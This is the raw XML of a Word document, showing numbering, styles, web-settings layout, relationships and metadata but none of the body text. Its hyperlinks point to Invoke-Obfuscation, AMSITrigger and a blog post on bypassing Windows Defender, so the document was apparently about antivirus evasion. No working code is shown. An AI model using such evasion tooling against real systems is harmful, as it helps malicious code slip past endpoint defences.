    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="2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00C"/>
    <w:rsid w:val="0055600C"/>
    <w:rsid w:val="009F73A4"/>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DB60E-FCDC-4E5D-BB3D-F473CB27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600C"/>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600C"/>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600C"/>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0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60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600C"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0055600C"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0055600C"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="readtime">
    <w:name w:val="readtime"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0055600C"/>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60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00C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="p">
    <w:name w:val="p"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="n">
    <w:name w:val="n"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="o">
    <w:name w:val="o"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nf">
    <w:name w:val="nf"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="bp">
    <w:name w:val="bp"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="w">
    <w:name w:val="w"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mr-2">
    <w:name w:val="mr-2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="0055600C"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="err">
    <w:name w:val="err"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nx">
    <w:name w:val="nx"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nt">
    <w:name w:val="nt"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="c">
    <w:name w:val="c"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="nv">
    <w:name w:val="nv"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s2">
    <w:name w:val="s2"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="kr">
    <w:name w:val="kr"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0055600C"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mi">
    <w:name w:val="mi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00556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670659">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="272633747">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1727801085">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="603416460">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="11775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126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016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3197442">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="5916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091">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="635379781">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1378967735">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1279919543">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1314606518">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="424615997">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="379522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775692">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1133403048">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1186558199">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1319577408">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="938950979">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1774126999">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2120368761">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1281719735">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2146266178">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1758330997">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="372077822">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1704016650">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="2070876583">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1119029305">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1848060983">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="933629222">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1499729859">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="159008268">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1590843077">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="556666216">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1854372114">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1640575663">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="130442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687681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2033862">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="17823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8541">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="19615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bohannon/Invoke-Obfuscation" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RythmStick/AMSITrigg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0xstarlight.github.io/posts/Bypassing-Windows-Defender/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/Bhaskarpal__" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielbohannon/Invoke-Obfuscation" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/RythmStick/AMSITri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2333</Words>
  <Characters>13302</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>110</Lines>
  <Paragraphs>31</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>15604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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-01T22:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-01T22:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>